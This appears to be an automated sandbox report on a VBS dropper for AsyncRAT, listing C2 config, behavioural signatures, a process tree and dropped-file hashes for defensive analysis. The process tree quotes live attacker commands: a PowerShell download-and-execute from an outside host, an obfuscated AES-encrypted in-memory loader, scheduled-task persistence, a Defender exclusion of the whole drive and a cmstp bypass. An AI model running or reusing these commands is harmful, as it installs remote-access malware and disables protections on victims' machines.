Analysis
-
max time kernel
100s -
max time network
140s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
09-12-2024 17:14
Static task
static1
Behavioral task
behavioral1
Sample
6890_output.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
6890_output.vbs
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
6890_output.vbs
Resource
win10ltsc2021-20241023-en
General
-
Target
6890_output.vbs
-
Size
46KB
-
MD5
653bf44f38fbe35cb4a51a366cce85e1
-
SHA1
5f08110e8b8174d62eb8beb3d8eedf507dc6471c
-
SHA256
0442d85e2af50c1f41e7cbf46850a204cf7cfd49eb5f0244e8b60cc28c313c24
-
SHA512
ed5c78d769eed4667ce8cceb14af498fcf41c36db88e47611f2157708513955a188a9aa60404cb99f632ca2b10596dfad60df3a9320083b92da14529ebdded19
-
SSDEEP
768:msJNohJ2GoBFClzkP/TFYgZutKI/OLixhGpOQU40GmaXQq9+RfomiJrW7PuA9:mTWGsClzkmtKIxGp1UOmWYfomiKH
Malware Config
Extracted
asyncrat
0.5.8
Default
87.120.113.125:55644
WzRdrlEJS302
-
delay
3
-
install
true
-
install_file
dwmm.exe
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral3/memory/560-207-0x00000000054A0000-0x00000000054B2000-memory.dmp family_asyncrat -
Blocklisted process makes network request 1 IoCs
flow pid Process 6 4608 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 2444 powershell.exe 416 powershell.exe 880 powershell.exe 3144 powershell.exe 2668 powershell.exe 4608 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
pid Process 1180 dwmm.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 17 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dwmm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 1536 timeout.exe 4724 timeout.exe 4396 timeout.exe -
Kills process with taskkill 1 IoCs
pid Process 3700 taskkill.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 964 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 39 IoCs
pid Process 4608 powershell.exe 4608 powershell.exe 416 powershell.exe 416 powershell.exe 4620 powershell.exe 4620 powershell.exe 880 powershell.exe 880 powershell.exe 4240 powershell.exe 4240 powershell.exe 3144 powershell.exe 3144 powershell.exe 560 powershell.exe 560 powershell.exe 2668 powershell.exe 2668 powershell.exe 3980 powershell.exe 3980 powershell.exe 2444 powershell.exe 2444 powershell.exe 560 powershell.exe 560 powershell.exe 560 powershell.exe 560 powershell.exe 560 powershell.exe 560 powershell.exe 560 powershell.exe 560 powershell.exe 560 powershell.exe 560 powershell.exe 560 powershell.exe 560 powershell.exe 560 powershell.exe 560 powershell.exe 560 powershell.exe 560 powershell.exe 560 powershell.exe 1180 dwmm.exe 1180 dwmm.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4608 powershell.exe Token: SeDebugPrivilege 416 powershell.exe Token: SeIncreaseQuotaPrivilege 416 powershell.exe Token: SeSecurityPrivilege 416 powershell.exe Token: SeTakeOwnershipPrivilege 416 powershell.exe Token: SeLoadDriverPrivilege 416 powershell.exe Token: SeSystemProfilePrivilege 416 powershell.exe Token: SeSystemtimePrivilege 416 powershell.exe Token: SeProfSingleProcessPrivilege 416 powershell.exe Token: SeIncBasePriorityPrivilege 416 powershell.exe Token: SeCreatePagefilePrivilege 416 powershell.exe Token: SeBackupPrivilege 416 powershell.exe Token: SeRestorePrivilege 416 powershell.exe Token: SeShutdownPrivilege 416 powershell.exe Token: SeDebugPrivilege 416 powershell.exe Token: SeSystemEnvironmentPrivilege 416 powershell.exe Token: SeRemoteShutdownPrivilege 416 powershell.exe Token: SeUndockPrivilege 416 powershell.exe Token: SeManageVolumePrivilege 416 powershell.exe Token: 33 416 powershell.exe Token: 34 416 powershell.exe Token: 35 416 powershell.exe Token: 36 416 powershell.exe Token: SeDebugPrivilege 3700 taskkill.exe Token: SeDebugPrivilege 4620 powershell.exe Token: SeDebugPrivilege 880 powershell.exe Token: SeDebugPrivilege 4240 powershell.exe Token: SeIncreaseQuotaPrivilege 4240 powershell.exe Token: SeSecurityPrivilege 4240 powershell.exe Token: SeTakeOwnershipPrivilege 4240 powershell.exe Token: SeLoadDriverPrivilege 4240 powershell.exe Token: SeSystemProfilePrivilege 4240 powershell.exe Token: SeSystemtimePrivilege 4240 powershell.exe Token: SeProfSingleProcessPrivilege 4240 powershell.exe Token: SeIncBasePriorityPrivilege 4240 powershell.exe Token: SeCreatePagefilePrivilege 4240 powershell.exe Token: SeBackupPrivilege 4240 powershell.exe Token: SeRestorePrivilege 4240 powershell.exe Token: SeShutdownPrivilege 4240 powershell.exe Token: SeDebugPrivilege 4240 powershell.exe Token: SeSystemEnvironmentPrivilege 4240 powershell.exe Token: SeRemoteShutdownPrivilege 4240 powershell.exe Token: SeUndockPrivilege 4240 powershell.exe Token: SeManageVolumePrivilege 4240 powershell.exe Token: 33 4240 powershell.exe Token: 34 4240 powershell.exe Token: 35 4240 powershell.exe Token: 36 4240 powershell.exe Token: SeDebugPrivilege 3144 powershell.exe Token: SeIncreaseQuotaPrivilege 3144 powershell.exe Token: SeSecurityPrivilege 3144 powershell.exe Token: SeTakeOwnershipPrivilege 3144 powershell.exe Token: SeLoadDriverPrivilege 3144 powershell.exe Token: SeSystemProfilePrivilege 3144 powershell.exe Token: SeSystemtimePrivilege 3144 powershell.exe Token: SeProfSingleProcessPrivilege 3144 powershell.exe Token: SeIncBasePriorityPrivilege 3144 powershell.exe Token: SeCreatePagefilePrivilege 3144 powershell.exe Token: SeBackupPrivilege 3144 powershell.exe Token: SeRestorePrivilege 3144 powershell.exe Token: SeShutdownPrivilege 3144 powershell.exe Token: SeDebugPrivilege 3144 powershell.exe Token: SeSystemEnvironmentPrivilege 3144 powershell.exe Token: SeRemoteShutdownPrivilege 3144 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3044 wrote to memory of 2152 3044 WScript.exe 80 PID 3044 wrote to memory of 2152 3044 WScript.exe 80 PID 2152 wrote to memory of 4608 2152 cmd.exe 82 PID 2152 wrote to memory of 4608 2152 cmd.exe 82 PID 4608 wrote to memory of 880 4608 powershell.exe 84 PID 4608 wrote to memory of 880 4608 powershell.exe 84 PID 880 wrote to memory of 3732 880 csc.exe 85 PID 880 wrote to memory of 3732 880 csc.exe 85 PID 4608 wrote to memory of 1984 4608 powershell.exe 86 PID 4608 wrote to memory of 1984 4608 powershell.exe 86 PID 3044 wrote to memory of 2336 3044 WScript.exe 100 PID 3044 wrote to memory of 2336 3044 WScript.exe 100 PID 2336 wrote to memory of 1480 2336 cmd.exe 102 PID 2336 wrote to memory of 1480 2336 cmd.exe 102 PID 1480 wrote to memory of 2256 1480 cmd.exe 104 PID 1480 wrote to memory of 2256 1480 cmd.exe 104 PID 1480 wrote to memory of 4620 1480 cmd.exe 105 PID 1480 wrote to memory of 4620 1480 cmd.exe 105 PID 1480 wrote to memory of 4620 1480 cmd.exe 105 PID 4620 wrote to memory of 880 4620 powershell.exe 106 PID 4620 wrote to memory of 880 4620 powershell.exe 106 PID 4620 wrote to memory of 880 4620 powershell.exe 106 PID 4620 wrote to memory of 4240 4620 powershell.exe 107 PID 4620 wrote to memory of 4240 4620 powershell.exe 107 PID 4620 wrote to memory of 4240 4620 powershell.exe 107 PID 4620 wrote to memory of 3144 4620 powershell.exe 110 PID 4620 wrote to memory of 3144 4620 powershell.exe 110 PID 4620 wrote to memory of 3144 4620 powershell.exe 110 PID 4620 wrote to memory of 3372 4620 powershell.exe 112 PID 4620 wrote to memory of 3372 4620 powershell.exe 112 PID 4620 wrote to memory of 3372 4620 powershell.exe 112 PID 3372 wrote to memory of 3972 3372 cmd.exe 114 PID 3372 wrote to memory of 3972 3372 cmd.exe 114 PID 3372 wrote to memory of 3972 3372 cmd.exe 114 PID 3972 wrote to memory of 4492 3972 cmd.exe 116 PID 3972 wrote to memory of 4492 3972 cmd.exe 116 PID 3972 wrote to memory of 4492 3972 cmd.exe 116 PID 3972 wrote to memory of 560 3972 cmd.exe 117 PID 3972 wrote to memory of 560 3972 cmd.exe 117 PID 3972 wrote to memory of 560 3972 cmd.exe 117 PID 560 wrote to memory of 2668 560 powershell.exe 118 PID 560 wrote to memory of 2668 560 powershell.exe 118 PID 560 wrote to memory of 2668 560 powershell.exe 118 PID 1480 wrote to memory of 1536 1480 cmd.exe 119 PID 1480 wrote to memory of 1536 1480 cmd.exe 119 PID 560 wrote to memory of 3980 560 powershell.exe 120 PID 560 wrote to memory of 3980 560 powershell.exe 120 PID 560 wrote to memory of 3980 560 powershell.exe 120 PID 560 wrote to memory of 2444 560 powershell.exe 122 PID 560 wrote to memory of 2444 560 powershell.exe 122 PID 560 wrote to memory of 2444 560 powershell.exe 122 PID 560 wrote to memory of 4084 560 powershell.exe 124 PID 560 wrote to memory of 4084 560 powershell.exe 124 PID 560 wrote to memory of 4084 560 powershell.exe 124 PID 560 wrote to memory of 2452 560 powershell.exe 125 PID 560 wrote to memory of 2452 560 powershell.exe 125 PID 560 wrote to memory of 2452 560 powershell.exe 125 PID 2452 wrote to memory of 4724 2452 cmd.exe 128 PID 2452 wrote to memory of 4724 2452 cmd.exe 128 PID 2452 wrote to memory of 4724 2452 cmd.exe 128 PID 4084 wrote to memory of 964 4084 cmd.exe 129 PID 4084 wrote to memory of 964 4084 cmd.exe 129 PID 4084 wrote to memory of 964 4084 cmd.exe 129 PID 3972 wrote to memory of 4396 3972 cmd.exe 130
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6890_output.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"2⤵
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4608 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3vjxiheh\3vjxiheh.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:880 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES74D2.tmp" "c:\Users\Admin\AppData\Local\Temp\3vjxiheh\CSCF160F39F16B4B76A79DAD0DA7FAA71.TMP"5⤵PID:3732
-
-
-
C:\windows\system32\cmstp.exe"C:\windows\system32\cmstp.exe" /au C:\windows\temp\iggnhd45.inf4⤵PID:1984
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\c.bat';$HtXR='ChLohBanLohBgLohBeExLohBteLohBnsLohBiLohBoLohBnLohB'.Replace('LohB', ''),'EnakFatrakFayPakFaoinakFatakFa'.Replace('akFa', ''),'DZRsYeZRsYcZRsYomZRsYpZRsYreZRsYsZRsYsZRsY'.Replace('ZRsY', ''),'CoCMmrpCMmryCMmrTCMmroCMmr'.Replace('CMmr', ''),'GefhddtCfhddurfhddrenfhddtfhddPfhddrocfhddefhddssfhdd'.Replace('fhdd', ''),'EleBsgfmeBsgfntABsgftBsgf'.Replace('Bsgf', ''),'FrTYXjomBTYXjaseTYXj64TYXjStrTYXjingTYXj'.Replace('TYXj', ''),'ReCDPWaCDPWdCDPWLiCDPWnesCDPW'.Replace('CDPW', ''),'TraKWcknKWcksfoKWckrKWckmFKWckinKWckaKWcklBKWckloKWckcKWckkKWck'.Replace('KWck', ''),'MjblMajblMijblMnjblMMjblMojblMdjblMuljblMejblM'.Replace('jblM', ''),'SnrJTplinrJTtnrJT'.Replace('nrJT', ''),'CrOEfHeaOEfHtOEfHeDeOEfHcryOEfHptoOEfHrOEfH'.Replace('OEfH', ''),'LBxjCoBxjCadBxjC'.Replace('BxjC', ''),'IjtXpnvjtXpojtXpkjtXpejtXp'.Replace('jtXp', '');powershell -w hidden;function wyHTI($FyZFc){$vRVbM=[System.Security.Cryptography.Aes]::Create();$vRVbM.Mode=[System.Security.Cryptography.CipherMode]::CBC;$vRVbM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$vRVbM.Key=[System.Convert]::($HtXR[6])('3eo8NN5tyKFa5visFn25QtJ0+4AjjFD7mC5TBO0PoNc=');$vRVbM.IV=[System.Convert]::($HtXR[6])('zdwkfoYoSPrzLDtsSJb42A==');$LDSfU=$vRVbM.($HtXR[11])();$ZfRpI=$LDSfU.($HtXR[8])($FyZFc,0,$FyZFc.Length);$LDSfU.Dispose();$vRVbM.Dispose();$ZfRpI;}function XfTte($FyZFc){$eHJHJ=New-Object System.IO.MemoryStream(,$FyZFc);$RoEKy=New-Object System.IO.MemoryStream;$bZzEN=New-Object System.IO.Compression.GZipStream($eHJHJ,[IO.Compression.CompressionMode]::($HtXR[2]));$bZzEN.($HtXR[3])($RoEKy);$bZzEN.Dispose();$eHJHJ.Dispose();$RoEKy.Dispose();$RoEKy.ToArray();}$FWOcx=[System.IO.File]::($HtXR[7])([Console]::Title);$ALHOl=XfTte (wyHTI ([Convert]::($HtXR[6])([System.Linq.Enumerable]::($HtXR[5])($FWOcx, 5).Substring(2))));$wRWWL=XfTte (wyHTI ([Convert]::($HtXR[6])([System.Linq.Enumerable]::($HtXR[5])($FWOcx, 6).Substring(2))));[System.Reflection.Assembly]::($HtXR[12])([byte[]]$wRWWL).($HtXR[1]).($HtXR[13])($null,$null);[System.Reflection.Assembly]::($HtXR[12])([byte[]]$ALHOl).($HtXR[1]).($HtXR[13])($null,$null); "4⤵PID:2256
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:880
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\c')5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4240
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 81503' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network81503Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3144
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network81503Man.cmd"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3372 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network81503Man.cmd"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3972 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network81503Man.cmd';$HtXR='ChLohBanLohBgLohBeExLohBteLohBnsLohBiLohBoLohBnLohB'.Replace('LohB', ''),'EnakFatrakFayPakFaoinakFatakFa'.Replace('akFa', ''),'DZRsYeZRsYcZRsYomZRsYpZRsYreZRsYsZRsYsZRsY'.Replace('ZRsY', ''),'CoCMmrpCMmryCMmrTCMmroCMmr'.Replace('CMmr', ''),'GefhddtCfhddurfhddrenfhddtfhddPfhddrocfhddefhddssfhdd'.Replace('fhdd', ''),'EleBsgfmeBsgfntABsgftBsgf'.Replace('Bsgf', ''),'FrTYXjomBTYXjaseTYXj64TYXjStrTYXjingTYXj'.Replace('TYXj', ''),'ReCDPWaCDPWdCDPWLiCDPWnesCDPW'.Replace('CDPW', ''),'TraKWcknKWcksfoKWckrKWckmFKWckinKWckaKWcklBKWckloKWckcKWckkKWck'.Replace('KWck', ''),'MjblMajblMijblMnjblMMjblMojblMdjblMuljblMejblM'.Replace('jblM', ''),'SnrJTplinrJTtnrJT'.Replace('nrJT', ''),'CrOEfHeaOEfHtOEfHeDeOEfHcryOEfHptoOEfHrOEfH'.Replace('OEfH', ''),'LBxjCoBxjCadBxjC'.Replace('BxjC', ''),'IjtXpnvjtXpojtXpkjtXpejtXp'.Replace('jtXp', '');powershell -w hidden;function wyHTI($FyZFc){$vRVbM=[System.Security.Cryptography.Aes]::Create();$vRVbM.Mode=[System.Security.Cryptography.CipherMode]::CBC;$vRVbM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$vRVbM.Key=[System.Convert]::($HtXR[6])('3eo8NN5tyKFa5visFn25QtJ0+4AjjFD7mC5TBO0PoNc=');$vRVbM.IV=[System.Convert]::($HtXR[6])('zdwkfoYoSPrzLDtsSJb42A==');$LDSfU=$vRVbM.($HtXR[11])();$ZfRpI=$LDSfU.($HtXR[8])($FyZFc,0,$FyZFc.Length);$LDSfU.Dispose();$vRVbM.Dispose();$ZfRpI;}function XfTte($FyZFc){$eHJHJ=New-Object System.IO.MemoryStream(,$FyZFc);$RoEKy=New-Object System.IO.MemoryStream;$bZzEN=New-Object System.IO.Compression.GZipStream($eHJHJ,[IO.Compression.CompressionMode]::($HtXR[2]));$bZzEN.($HtXR[3])($RoEKy);$bZzEN.Dispose();$eHJHJ.Dispose();$RoEKy.Dispose();$RoEKy.ToArray();}$FWOcx=[System.IO.File]::($HtXR[7])([Console]::Title);$ALHOl=XfTte (wyHTI ([Convert]::($HtXR[6])([System.Linq.Enumerable]::($HtXR[5])($FWOcx, 5).Substring(2))));$wRWWL=XfTte (wyHTI ([Convert]::($HtXR[6])([System.Linq.Enumerable]::($HtXR[5])($FWOcx, 6).Substring(2))));[System.Reflection.Assembly]::($HtXR[12])([byte[]]$wRWWL).($HtXR[1]).($HtXR[13])($null,$null);[System.Reflection.Assembly]::($HtXR[12])([byte[]]$ALHOl).($HtXR[1]).($HtXR[13])($null,$null); "7⤵
- System Location Discovery: System Language Discovery
PID:4492
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2668
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network81503Man')8⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3980
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 81503' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network81503Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2444
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "dwmm" /tr '"C:\Users\Admin\AppData\Roaming\dwmm.exe"' & exit8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "dwmm" /tr '"C:\Users\Admin\AppData\Roaming\dwmm.exe"'9⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:964
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpAAC2.tmp.bat""8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Windows\SysWOW64\timeout.exetimeout 39⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4724
-
-
C:\Users\Admin\AppData\Roaming\dwmm.exe"C:\Users\Admin\AppData\Roaming\dwmm.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1180
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout /nobreak /t 17⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4396
-
-
-
-
-
C:\Windows\system32\timeout.exetimeout /nobreak /t 14⤵
- Delays execution with timeout.exe
PID:1536
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:416
-
C:\Windows\system32\taskkill.exetaskkill /IM cmstp.exe /F1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3700
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD525b2ce30904bdc3e8f50d98698989919
SHA1b812ec3da4039cc86757a484f69750a4dfcb4f15
SHA256d42a7f0ca85e0ff0d114cb37367b445224a1088094d4161e4defb2508c85204b
SHA5123d5062e33ace16d200cd9e0d2f2456097bea26029812f483ad2845796f8664e389a346d89d4f88cc62b0acf955e636200a9defd14526066f0e0aa10ed9a4ad9f
-
Filesize
21KB
MD5de9cd2c2ecf47402004f661c70b40292
SHA1202aac622d08570d28420112a5fb7394bbf30933
SHA2560d42d2e71b5c0ba1f772f47228a0e072fcb7e88802bbfd57374036f4cf82d9f3
SHA512018c0751d0657544fe6b67de4f748162f3294c25fe280b2232dff87ddd81a95392244df5c8f01463cfa1f4db8d52ebcb98b1cfb80d68de8aa139b23af0132b4d
-
Filesize
21KB
MD583b0672f5c5bd3ea1d2bdb6ce3364035
SHA1b38ef46a9a8f62bf0c54f24439c3c9125be76613
SHA25644c140c3e431f7df8276b026a5b5005cfb26dcaa27ff0b358be53b38502a4101
SHA5123b3d87bdfc4cbe6cc9559a20dc353fe88300c2a556ccc798af3c7f6e4fb58fc729cbb8a725a0fc9340e443b3d85be765ad3565da1cdaecaf67988444a726f656
-
Filesize
20KB
MD5fc540745a66b3f833f4ebbedf98f4caf
SHA16a76c8cf452194e053ea69283c31123ed5f2a1ad
SHA256272b1d2d25c1caa82671c3ef22fd9099900b6df66bac81801b68fdc4631dd64c
SHA512b2ef95e333376c3cb845196788f8572b9e260fb60b15bfe1ae7ae6d1f352e1d976db3bacf17333bc78219f4a61b91e6c429a9aa7325f34bdac3e4507c840e61c
-
Filesize
21KB
MD5a4500751586f80731da3c814ef2046f2
SHA1283f3af2d489f58bfd8a987f24f3ef1ae2ae3df0
SHA256568a6dd7ae371d699f9c3c083950c0591bacd7ef89efd351f5712d799fcc18b7
SHA512010548d78713361e9e57a1e8b4f3ad521e22c6d31fa6f164f074e2064c778400acd6e7f00fdb6f1696b1c34ec4bcbeaefb8c7bfcac43582e033e759aa3832128
-
Filesize
20KB
MD5e0f5960a0556433b232de954a76b8cb3
SHA1217a8fbae907fe13e520d59d836b9be0085fb289
SHA256a944b265801f12fd00e5de30c3c2b67c5eca16a8f882a11a8d288e55389d102d
SHA51204a02e598d0054798dcb127e2be9540574267385cb6f9d7f8779ad540c573d3f599851ba9a351c914e6f7b73c5b4f73e044f62b47d38c0e325aaa22fac9dccdf
-
Filesize
1KB
MD5129b0eae051e116c39b4a49f152aca98
SHA1a8ee88da2dd6724280dcba08760f311589c25cdd
SHA256f510fc496a4bdb4e8045d66b81620156d51c17b33f6499472c00ac72abcf73ff
SHA51262d480dee86e7a08487afdaba6bef104518fd9ba9ecbcbeb0efab87ac09d7e73aed40b84c40b4d602bf758a895eca6acd6b9dae748ca5010942f93a48f383a3a
-
Filesize
4KB
MD5cfcc8b0667278ba2cc89a46b29162f6c
SHA1e13a36ab1a4ebb74b3694783d9c3476f27acd190
SHA25625c4339206e5fb2ba6df4272ad92f9a782234d8c40928fc259572535f9cd5e59
